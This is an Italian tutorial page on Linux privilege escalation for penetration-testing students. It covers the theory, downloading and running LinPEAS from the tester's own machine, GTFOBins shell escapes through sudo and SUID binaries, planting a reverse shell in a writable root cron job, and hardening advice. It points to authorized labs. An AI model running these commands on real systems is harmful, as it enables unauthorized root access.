Home › Post-Exploitation › Privesc Linux
Privilege Escalation — Linux
Fase 5: hai una shell da utente normale. Obiettivo: diventare root. Si vince trovando una configurazione sbagliata.
Teoria: dove si nasconde la strada
La privesc quasi mai è "un exploit magico": è trovare qualcosa mal configurato che ti dà più poteri di quelli che dovresti avere. Le categorie principali:
- Sudo permissivo (puoi eseguire comandi come root).
- Binari SUID (girano come il proprietario, spesso root).
- Cron job scritti male (eseguiti da root a intervalli).
- Capabilities pericolose, permessi di file sensibili, kernel vecchio.
Passo 1 — enumeration automatica
Scarica ed esegui LinPEAS: evidenzia in rosso/giallo tutte le possibili strade.
# sulla Kali: servi il file
python3 -m http.server 80
# sul target: scarica ed esegui
cd /tmp && wget http://TUO_IP/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh
Passo 2 — controlli manuali (i più redditizi)
sudo -l
sudo -l # cosa posso eseguire come root senza password?
Se un binario è elencato, cerca la via di fuga su GTFOBins. Esempio classico, se puoi fare sudo find:
sudo find . -exec /bin/sh \; -quit # → shell di root
Altri esempi GTFOBins comuni:
sudo vim -c ':!/bin/sh'
sudo less /etc/profile # poi digita !/bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'
Binari SUID
find / -perm -4000 -type f 2>/dev/null
Per ogni binario "strano" (non standard) controlla GTFOBins nella sezione SUID. Es. con find SUID:
find . -exec /bin/sh -p \; -quit # -p mantiene i privilegi
Cron job
cat /etc/crontab
ls -la /etc/cron.*
Se un cron di root esegue uno script scrivibile da te, ci metti dentro la tua reverse shell e aspetti.
Capabilities & kernel
getcap -r / 2>/dev/null # es. python con cap_setuid → root
uname -a # versione kernel → cerca kernel exploit
Difesa
- Minimo privilegio in
sudoers; niente binari che "escapano" (vim, find, less...) via sudo. - Rimuovere SUID non necessari; niente script cron scrivibili da utenti.
- Patch del kernel e dei pacchetti; audit periodici con strumenti come Lynis.
Lab autorizzati
THMLinux PrivEscFacileLa room di riferimento: SUID, sudo, cron, path, capabilities. THMLinux Privilege EscalationMedioApprofondimento con scenari realistici. THMCommon Linux PrivescFacileI vettori più frequenti, guidati. Risorsa d'oro: GTFOBins (dal tuo file siti) + HackTricks — Linux Privesc. Libri: Gray Hat Hacking, The Shellcoder's Handbook.